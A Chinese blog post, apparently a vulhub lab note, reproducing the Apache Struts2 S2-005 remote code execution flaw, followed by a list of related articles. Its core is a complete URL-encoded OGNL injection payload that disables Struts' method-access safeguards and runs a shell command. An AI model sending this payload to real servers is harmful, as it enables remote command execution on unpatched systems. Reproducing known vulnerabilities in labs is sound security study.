S2-005 远程代码执行漏洞

最新推荐文章于 2024-05-29 15:28:18 发布
最新推荐文章于 2024-05-29 15:28:18 发布
阅读量282 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119417309
版权

漏洞简介

影响版本: 2.0.0 - 2.1.8.1
漏洞详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-005/README.zh-cn.md
虽然不是很详细

漏洞复现

发送如下参数就可以执行命令touch /tmp/success 但没有回显:

(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1047
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
Apache Struts2 S2-005 远程代码执行漏洞
m0_63241485的博客
08-20 1542
XWork会将GET参数的键和值利用OGNL表达式解析成Java语句,如:user.address.city=Bishkek&user[‘favoriteDrink’]=kumys//会被转化成触发漏洞就是利用了这个点,再配合OGNL的沙盒绕过方法,组成了S2-003。官方对003的修复方法是增加了安全模式(沙盒),S2-005在OGNL表达式中将安全模式关闭,又绕过了修复方法。整体过程如下:S2-003 使用\u0023绕过s2对#的防御S2-003 后官方增加了安全模式(沙盒)
S2-005 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-14 2713
漏洞信息 漏洞信息页面: https://cwiki.apache.org/confluence/display/WW/S2-005 漏洞成因官方概述:XWork ParameterInterceptors bypass allows remote command execution 漏洞影响: 漏洞分析 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访...
struts S2-005 远程代码执行漏洞
haha1314的博客
07-15 2271
S2-005 远程代码执行漏洞 影响版本: 2.0.0 - 2.1.8.1 漏洞详情: http://struts.apache.org/docs/s2-005.html 原理 参考吴翰清的《白帽子讲Web安全》一书。 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OG...
vulhub-struts2-S2-005 远程代码执行漏洞复现
qq_56426046的博客
06-19 526
s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
s2-005远程执行漏洞靶机练写poc和exp
rlenew的博客
12-04 1651
在安装好环境后,页面如下 靶机的ip为192.168.6.217 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配置(禁止静态方法调用和类方法执行),再次造成漏洞。 在github上有一段没有回显的poc验证 (%27%5cu0023_memberAccess[%5c%27allowStaticM
漏洞复现----28、Struts2/S2-005
七天
06-29 529
影响版本 2.0.0 - 2.1.8.1 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞
struts2反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
structs2最新远程执行漏洞S2-057、反序列化漏洞等修复方案
08-30
Apache Struts2 官方发布了最新的安全公告,披露了一个远程命令执行漏洞漏洞编号:CVE-2018-11776,官方编号:S2-057),攻击者可利用漏洞实施远程命令执行攻击。特给出struct2.0-2.3.35的修复方案
Strust2 远程代码执行漏洞[s2-005]
最新发布
流水不争先,争的是滔滔不绝
05-29 710
漏洞影响版本【2.0.0 - 2.1.8.1】
Struts2漏洞S2-005复现笔记
hklearner的博客
03-30 2920
Struts2漏洞S2-001复现笔记 漏洞原理 s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻
Struts2漏洞分析与研究之S2-005漏洞分析
热门推荐
Exploit的小站~
05-10 2万+
 转载请注明出处:http://blog.csdn.net/u011721501?viewmode=list 1、概述 S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的。我们都知道访问Ognl的上下文对象必须要使用#符号,S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过。 S2-005则是绕过官方的安全配...
vulhub中Struts2-005 远程代码执行漏洞复现
yougexiaojiuguan的博客
04-05 351
漏洞复现过程的记录
vulhub struts2漏洞搭建与复现(s2-001 s2-005
wocao___的博客
02-20 936
s2-001 github下载vulhub git clone https://github.com/vulhub/vulhub.git 下载完成后进入目录vulhub/struts2/s2-001 docker-compose up -d 启动 docker ps查看容器运行状态 浏览器访问ip+端口 查看目录vulhub/struts2/s2-001中的readme中文说明 S2-001 远程代码执行漏洞 原理 参考 http://rickgray.me/2016/05/06/rev
s2系列——s2-005复现
qq_54030686的博客
03-01 4095
残缺版本exp 先采用能够爆出路径的payload,验证网址是否存在s2-005漏洞,然后在使用执行代码的payload进行利用,这里不再赘述,但是不同博主的文章下payload肯定不尽相同,有可能会出现无法利用的payload,不用担心,换一个就好 靶场使用vulhub中s2-005靶场 使用正则表达式判断回显,代码来自github上struts.py,经过些许修改,可以正常执行命令,展示 进入docker容器后,实在根目录的相应文件夹下创建文件,但是不晓得反弹shell的逻辑是啥,使用bash反弹s
java struts2 漏洞复现合集
whatday的专栏
08-31 5202
目录 一、S2-001复现 二、S2-005复现 三、S2-007复现 四、S2-008复现 五、S2-009复现 六、S2-012复现 七、S2-013复现 八、S2-015复现 九、S2-016复现 十、S2-045复现 十一、S2-048复现 十二、S2-052复现 十三、S2-053复现 十四、S2-057复现 十五、S2-019复现 十六、S2-devMode 复现 Apache Struts2 是一个基于MVC设计模式的Web应用框架,会对某些标签属性(比如 i
S2-052远程代码执行漏洞
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值